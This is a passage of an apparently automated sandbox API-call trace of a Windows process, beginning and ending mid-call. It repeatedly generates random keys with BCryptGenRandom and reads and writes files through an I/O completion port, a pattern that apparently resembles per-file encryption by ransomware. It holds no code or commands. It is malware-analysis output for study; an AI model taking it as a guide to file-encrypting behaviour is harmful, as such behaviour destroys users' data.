lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.047] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3838, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.048] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.049] CloseHandle (hObject=0x3cc) returned 1 [0197.049] free (_Block=0x3df0008) [0197.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.059] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.060] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.060] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.060] free (_Block=0x3e305b8) [0197.060] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.060] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.061] free (_Block=0x1fa91d0) [0197.061] free (_Block=0x1fa2ed8) [0197.061] free (_Block=0x1fa90b8) [0197.061] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.061] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.062] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.074] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x632, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.074] CloseHandle (hObject=0x3cc) returned 1 [0197.074] free (_Block=0x3df0008) [0197.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.085] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.085] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.085] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.086] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.086] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.086] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.086] free (_Block=0x3e305b8) [0197.086] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.086] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.087] free (_Block=0x1fa91d0) [0197.087] free (_Block=0x1fa2ed8) [0197.087] free (_Block=0x1fa90b8) [0197.087] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.087] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.088] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.113] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7c6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.113] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.124] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.125] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.125] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.125] free (_Block=0x3e305b8) [0197.125] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.125] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.125] free (_Block=0x1fa91d0) [0197.125] free (_Block=0x1fa2ed8) [0197.125] free (_Block=0x1fa90b8) [0197.126] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0197.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.220] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0197.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.221] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.222] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.222] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.222] free (_Block=0x3e305b8) [0197.222] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.222] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.250] free (_Block=0x1fa91d0) [0197.250] free (_Block=0x1fa2ed8) [0197.250] free (_Block=0x1fa90b8) [0197.250] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0197.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.253] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xa880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0197.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.275] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x27ee, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.277] CloseHandle (hObject=0x170) returned 1 [0197.277] free (_Block=0x3df0008) [0197.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.287] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.287] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.287] free (_Block=0x3e305b8) [0197.287] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.287] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.287] free (_Block=0x1fa91d0) [0197.287] free (_Block=0x1fa2ed8) [0197.287] free (_Block=0x1fa90b8) [0197.287] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.288] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.300] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1820, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.301] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.301] CloseHandle (hObject=0x170) returned 1 [0197.301] free (_Block=0x3df0008) [0197.301] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.312] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.312] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.312] free (_Block=0x3e305b8) [0197.312] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.312] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.312] free (_Block=0x1fa91d0) [0197.312] free (_Block=0x1fa2ed8) [0197.312] free (_Block=0x1fa90b8) [0197.312] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.313] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.348] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13d6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.349] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.350] CloseHandle (hObject=0x170) returned 1 [0197.350] free (_Block=0x3df0008) [0197.350] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.374] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.374] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.374] free (_Block=0x3e305b8) [0197.374] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.374] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.374] free (_Block=0x1fa91d0) [0197.374] free (_Block=0x1fa2ed8) [0197.374] free (_Block=0x1fa90b8) [0197.374] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.376] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1ab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.392] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1498, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.394] CloseHandle (hObject=0x170) returned 1 [0197.394] free (_Block=0x3df0008) [0197.394] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.404] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.404] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.404] free (_Block=0x3e305b8) [0197.404] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.404] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.404] free (_Block=0x1fa91d0) [0197.404] free (_Block=0x1fa2ed8) [0197.404] free (_Block=0x1fa90b8) [0197.404] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.408] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.408] CloseHandle (hObject=0x170) returned 1 [0197.409] free (_Block=0x3df0008) [0197.409] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.419] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.419] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.420] free (_Block=0x3e305b8) [0197.420] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.420] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.420] free (_Block=0x1fa91d0) [0197.420] free (_Block=0x1fa2ed8) [0197.420] free (_Block=0x1fa90b8) [0197.420] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.420] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.421] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.431] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x158c, lpNumberOfBytesRead=0x0, 